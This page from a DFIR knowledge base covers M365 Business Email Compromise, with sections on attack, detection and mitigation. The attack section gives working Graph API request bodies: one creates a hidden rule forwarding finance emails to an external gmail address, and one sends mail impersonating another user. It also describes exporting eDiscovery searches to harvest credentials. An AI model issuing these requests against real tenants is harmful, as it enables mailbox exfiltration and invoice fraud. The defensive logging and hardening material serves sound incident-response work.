📘
DFIR
  • Networking
    • Networking
      • SDWAN
      • VLANs
      • Virtual Networking
      • Segmentation
      • Applications
        • PAM/SSO
          • Privileged Password Management
          • Authentik
          • Beyond Trust
          • Cyberark
        • Network Tools
          • Palo Alto
          • Sonicwall
          • ZScaler
          • Firewalls
  • Windows
    • Administration
      • Honeypot
      • Deployment
      • Rogue Devices on Network
    • Forensics
      • System Info
      • Memory
        • Pagefile.sys
        • PowerShell Dump
        • Memory Forensics
      • Network Logs
        • UAL
        • Page 1
      • File System
        • Mounting File Systems
        • Log2Timeline
        • Volume Shadow Copies
        • $I30
        • UsnJournal/$LogFile
        • MFT
        • NTFS
        • Shellbags
        • Recycle Bin
      • Registry
        • Logged in Accounts
        • TypedPaths
        • WordWheelQuery
        • Page 5
      • Network Share
      • Exfiltration
        • RDP Clipboard
        • Exfil Exercise
        • DNS Over HTTPS
      • Evidence of Execution
        • Sum UAL
        • Office Apps Forensics
          • LastVisitedPidlMRU
          • File MRU
          • Trusted Documents
        • Run MRU
        • RecentDocs
        • FeatureUsage
        • BAM
          • DAM
        • Prefetch
        • Shimcache
        • RecentApps
        • AmCache
        • PCA
        • MUICache
        • UserAssist
        • SRUM
        • LNK Files
        • JumpLists
      • Hacktool Artifacts
        • DCSync
        • Impackets
          • GetUserSPN.py/Kerberoasting
          • Page
        • Psexec
        • Web Shells
        • BloodHound
      • Event Logs
        • Event Log IDs
          • SMB
            • 30803 Failed to Establish a Network Connection
            • 31010 SMB Client Failed to Connect
            • 551 SMB Auth Failed
            • SMB Forensics
          • 4740 Account Lockout
          • 4642 Logon
          • 5156 Show App IP Connections
        • Windows Defender
        • LOLBins
          • WebDav
          • Crashes (WER)
          • PowerShell
          • Scheduled Tasks
          • Services
          • WinRS
          • WinRM
          • RDP
            • 1024 RDP ClientActiveX is trying to connect
          • WMI
        • DNS Logs
        • Application NTDS.dit
        • Kerberos
        • Exchange
        • GPOs and OUs
        • Anti Forensics
      • 3rd Party Apps
        • IIS
        • Kubernetes
        • GitHub
        • Jenkins
        • Snowflake
        • Misc
          • Veeam
          • MongoDB
        • "TA Tools"
          • Ngrok
          • 7-Zip
          • PDQ Deploy
          • TotalCMD
          • WinSCP
        • Identity Apps
          • Okta
        • Microsoft
          • Microsoft Teams
          • VS Code
          • Excel
          • Notepad
        • SysInternals
          • PsExec.exe
        • RMM
          • ScreenConnect Forensics
          • AnyDesk
        • Zoom
        • Browser Forensics
          • Recovering Deleted History
          • Browser Artifacts
      • Example Page
    • Cheat Sheet
      • Red Team:
      • Windows Event Logs
      • Quick Wins
      • Docker
      • Admin
      • Zimmerman
    • Investigation
      • Malware Analysis
        • Macros Analysis
        • Packers
      • Persistence
        • Host Based Persistence Cheatsheet
        • M365 Persistence Cheatsheet
      • DFIR Tools
        • Volatility
        • Velociraptor
        • KAPE
        • Logman
      • Insider Threats
      • Scattered Identity
    • Internals
      • Structure
        • SMB
          • Admin
          • Attacks
        • Alternate Data Streams
        • Protocols
          • Wdigest
          • DPAPI
          • Kerberos
          • NetLogon
        • WinAPI
        • COM Objects
        • Files Types
        • DLLs
          • Attacks
            • Reflective DLL Injection
            • DLL Hijacking
        • Folders of Interest
      • Privileges
        • UAC
      • Applications
        • Werfault
        • Process Creation
        • Pipes
        • AMSI
        • LOLBins
          • xCyclopedia Index (EXEs)
          • WMI
          • Certutil.exe
          • Rundll32.exe
          • Schtasks.exe
          • Svchost.exe
          • DLLHOST.exe
          • MSIExec.exe
        • PowerShell
          • VBS
          • Forensics
          • Classes
          • Logging
          • PowerShell Modules
        • LSASS
          • Lsass Forensics
    • Active Directory
      • Internals
        • Sysvol
        • Attributes
      • Secure AD
        • Logs
        • Credentials
          • Restricted Admin Mode
          • LAPS
      • Attacks
        • Vulnerabilities
          • ViewState
          • ProxyShell
          • OWASSRF
        • Credential Theft
          • DCSync
        • ADCS
      • MSSQL
        • Admin
        • Attacks
    • MISC
      • Offensive Tool Analysis
      • Investigating Specific Activity
        • User Account Deleted
      • Dumping Domain Hashes with IFM Images
      • Lateral Movement
      • Advanced Obfuscation
      • SCCM
      • Malware Traffic
  • Linux
    • Forensics
      • Cron Jobs
      • File System Types and Timestamps
      • LD_PRELOAD
      • Linux Auditing Logs
      • example page
      • Process Accounting (pacct)
      • mlocate.db
    • SSH
    • Linux WebShells
    • Directories of Interest
    • Internals
      • Logs
      • File Descriptors
      • GTFOBins
  • Enterprise Architecture
    • CI/CD Pipline
      • Jenkins
    • Citrix
      • XenApp
      • Pentesting Guide
      • Forensics
    • Web Applications
      • JWT: JSON Web Tokens
      • Apache
        • CGI-Bins
      • ColdFusion
        • Attacking ColdFusion
    • The Cloud
      • AWS
        • Cases
        • Misconfigurations
        • Attacking AWS
          • SES
          • Privilege Escalation
        • Fundementals
          • Hierarchy
          • Roles
          • Security Services
          • IAM
            • Keys
          • CloudTrail
          • Services
            • S3
            • SES
      • Azure
        • Hunting
        • Admin
        • Securing Azure
          • CA Policies
        • CheatSheet
        • Detections
        • Forensics
        • Attacking Azure
          • Persistence
            • Cloud VMs
            • Applications
            • SSPR/MFA
          • Credential Theft
            • Golden SAML Theft
            • Attacking key vaults
            • Skeleton Keys (PTA Abuse)
            • Family of Client IDs
            • Token Theft
          • Initial Access
            • Subdomain Takeover
            • Authenticated Recon
            • Unauthenticated Recon
            • Password Spraying M365
            • Password Spraying OWA
            • OAuth 2.0 Abuse
            • Device code authentication abuse
            • M365 Business Email Compromise
          • Page 6
          • Test Page
        • Fundementals
          • Security/Service Principals
          • Tokens
          • Hierarchy
          • Roles
          • Architecture
          • Conditional Access
        • Logging
          • Audit Logs
      • M365
        • Forensics
          • Tokens
        • Business Email Compromise
        • Hardening
      • Cloud Labs
    • vSphere
      • Forensics
      • Hardening
      • Admin
    • Containers
      • Troubleshooting
      • Linxserver.io
      • Container Forensics
        • Docker Logs
      • Kubernetes
    • Troubleshooting
      • Cheatsheet
  • Mac
    • Forensics
      • Page 3
  • Attacker Information
    • Adversary Operations
      • c99 Webshell
      • Page 2
    • Actor Playbooks
      • TA Infrastructure
    • Abused Domains
  • IR Playbook
    • Activity from Unmanaged Host
    • Recommendations
  • Reverse Engineering
    • Python - Pyinstaller
Powered by GitBook
On this page
  • What Is BEC (Business Email Compromise)?
  • Attack
  • Example attack flow
  • Leveraging Graph API for BEC
  • Creating Malicious Inbox Rule
  • Send an email as another user
  • Leverage eDiscovery to Search
  • Detect
  • What logs are available?
  • Emails Accessed
  • Ediscovery
  • Email Forwarding Rules
  • Exchange Permission Abuse:
  • BEC Persistence:
  • Mitigate
  • Proactive Steps
  • Disable Forwarding Rules to Outbound
  1. Enterprise Architecture
  2. The Cloud
  3. Azure
  4. Attacking Azure
  5. Initial Access

M365 Business Email Compromise

PreviousDevice code authentication abuseNextPage 6

Last updated 1 year ago

What Is BEC (Business Email Compromise)?

Attack

Once an attacker gains access to a compromised mailbox, they may further perform actions on objectives like:

  • Grant permissions to mailboxes

  • Malicious forwarding rules

  • Creating new users

  • OAuth abuse

  • Disabling audit logging

  • Abuse of eDiscovery (search for emails and exfiltrate them)

  • Credential pilfering

  • Recon on security incident

Example attack flow

Ability to perform these actions depends on the amount of permissions an account has:

  • Read emails on account

  • Run eDiscovery search for keywords "salary" or "bonus" in the title.

  • Create forwarding rule to send emails with "invoice" or "finance keywords to third-party mailbox and mark them as read.

  • Add "sendas" permission to users (requires admin privs)

  • Add member to a role i.e. Exchange Administrator (requires admin privs)

Leveraging Graph API for BEC

Some actions require administrative consent:

  • Adding members to groups

Creating Malicious Inbox Rule

The following rule will forward any email containing finance keywords to be forwarded to a malicious gmail account.

Send post request to:

  • https://graph.microsoft.com/v1.0//me/mailFolders/inbox/messageRules

Body of POST request:

{
    "displayName": "sussy bussy",
    "sequence": 2,
    "isEnabled": true,
    "conditions": {
        "subjectContains": [
          "invoice",
          "banking",
          "finance",
          "accounting"
        ]
     },
     "actions": {
        "forwardTo": [
          {
             "emailAddress": {
                "name": "abe lincan",
                "address": "noahrincon0@gmail.com"
              }
           }
        ],
        "stopProcessingRules": true
     }
}

Send an email as another user

Must be an administrative user and assign the "Send on behalf of permission" to the compromised user account. In the below screenshots, Bob Jones will be able to send emails on behalf of Alex Wilber.

Impersonate users with SendAs function.

  • POST Request: https://graph.microsoft.com/v1.0/me/sendMail

Request body:

{
    "message": {
        "subject": "Expenses Requried",
        "body": {
            "contentType": "Text",
            "content": "Please expense this request, it is urgent."
        },
        "toRecipients": [
            {
                "emailAddress": {
                    "address": "LeeG@vk1zm.onmicrosoft.com"
                }
            }
        ],
        "from": {
            "emailAddress": {
                "address": "AlexW@vk1zm.onmicrosoft.com"
            }
        }
    }
}

Leverage eDiscovery to Search

Navigate to the Purview Compliance portal: https://compliance.microsoft.com/homepage

This will allow you to create a case and search with coniditions through Exchange, Yammer, Teams, SharePoint, OneDrive, etc. Useful for pilfering for credentials or reading contents of emails.

Create a search in eDiscovery and export results.

Detect

What logs are available?

Primary:

  • UAL

  • Azure Audit Logs

  • Sign-Ins

  • Azure Activity Logs

  • Message Tracing Logs

Secondary:

  • Azure AD Provisioning Logs

  • Azure Resource Logs (needs to be enabled).

  • Diagnostic Logs

  • Security Reports

Log Retention:

Log Source
Azure AD Free
Azure AD P1
Azure AD P2

Audit Logs

7 Days

30 Days

30 Days

Sign In Logs

7 Days

30 Days

30 Days

Unified Audit Logs

30 Days

Up to 1 year depending on retention policy

Up to 1 year depending on retention policy

Best to push these logs into SIEM, Sentinel, or external account to keep evidence.

Emails Accessed

UAL Operations:

  • MailItemsAccessed: Messages read or accessed (only logged for e5 licenses).

  • FileAccessed: User accesses file on sharepoint or onedrive.

Find MailItemsAccessed log and input it in explorer or message trace to find specific email.

Ediscovery

UAL Operations:

  • SearchStarted/SearchCreated: Content search was started

  • SearchExported: Results were exported

  • SearchExportDownloaded: Export was downloaded

  • SearchPreviewed/PreviewItemListed: Previewed search results

  • SeachRemoved: Search was deleted

  • CaseAdded/Removed: Case management in eDiscovery.

Admin must give permission to user for them to use eDiscovery.

Microsoft alerts on this activity.

Email Forwarding Rules

UAL Operations:

  • New-InboxRule - Inbox Rule Created

  • Set-InboxRule - User modified inbox rule using OWA

  • UpdateInboxRule - Inbox rule was modified, deleted, created by mailbox owner

  • Move - Message was moved to another folder

By default, forwarding rules are disabled by Microsoft's "scure by default" principles. Most companies have reenabled this.

Exchange Permission Abuse:

SendOnBehalf and accessing mailboxes require Admin privs.

UAL Operations:

  • Add-MailboxPermission - Admin assigned FullAccess mailbox permission to user allowing them to read/manage another inbox.

  • AddFolderPermission/UpdateFolderPermission - Allows user to access a folder and the message/mail within it.

  • SendAs - Message was sent using SendAs permission

  • SendOnBehalf - Message sent with SendOnBehalf permission

Message sent to nebula from AlexW (on behlaf of AlexW).

IDs at the end are object IDs for users. Malicious user was granted permissions to SendOnBehalf of another user. Trustee is able to send on behalf of Identity.

[
    {
        "Name": "Identity",
        "Value": "NAMPR16A009.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/vk1zm.onmicrosoft.com/d8d0fe46-8005-4853-98bb-f8c233a826f6"
    },
    {
        "Name": "Trustee",
        "Value": "NAMPR16A009.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/vk1zm.onmicrosoft.com/10b46204-5dac-441a-8b07-3ea8d6605984"
    },
    {
        "Name": "AccessRights",
        "Value": "SendAs"
    }
]

BEC Persistence:

Azure Audit Logs Operations:

Requires admin privs to all:

  • Add member to role - Added a user to an admin role in m365

  • Add member to group - Added a user to a group in Azure AD

  • Updated group - Updating property on a group

  • Add service principal credentials - Adding a secret to a service principal in Azure AD

Mitigate

Proactive Steps

  • Ensure MFA is enabled on all accounts, if an account is compromised reset the password and token.

  • Enforce strong password policy.

  • Forward all M365/Azure logs to a SIEM.

  • Block any mail forwarding to an external domain

  • Create alerting rules for permissions being granted to users/forwarding rules being created/new users being created.

Disable Forwarding Rules to Outbound

This is turned off by default.

Business-Email-Compromise-Guide/PwC-Business_Email_Compromise-Guide.pdf at main · PwC-IR/Business-Email-Compromise-GuideGitHub
Graph Explorer | Try Microsoft Graph APIs - Microsoft Graph
GUI GraphAPI view
Get started with the Microsoft Graph PowerShell SDKMicrosoftLearn
PowerShell Graph API
Microsoft Graph REST API v1.0 endpoint reference - Microsoft Graph v1.0MicrosoftLearn
All available API requests
Logo
Logo
Logo
Logo
Navigate to assign
Assigned
Check path to see the directory of the message